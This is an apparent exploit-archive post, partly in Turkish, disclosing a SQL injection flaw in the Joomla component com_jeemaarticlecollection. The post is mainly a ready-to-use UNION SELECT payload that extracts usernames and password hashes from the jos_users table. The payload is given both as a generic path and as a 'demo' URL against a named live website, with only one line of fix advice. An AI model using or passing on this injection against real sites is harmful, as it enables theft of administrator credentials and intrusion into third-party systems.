The Joomla Jeema Article Collection component suffers from a remote SQL injection vulnerability.
a59e37d5953bbd33eae24cb199ed115a
<------------------- header data start ------------------- >
#############################################################
Joomla Component com_jeemaarticlecollection SQL injection Vulnerability
#############################################################
#author : Fl0riX
# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name : com_jeemaarticlecollection
# Bug Type : SQL Injection
# Infection : Admin login bilgileri alýnabilir.
# Demo Vuln. :
http://www.aerospinningym.com/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir. Kimsesizliðim O Dereceye Vardý Ki Çevremde Bela Girdabýndan Baþka Dönen Kimse Yok.(!)
# Note : Kimsesizliðim O Dereceye Vardý Ki Çevremde Bela Girdabýndan Baþka Dönen Kimse Yok.(!)
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection
< -- bug code end of -- >
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010
Comments
No comments yet, be the first!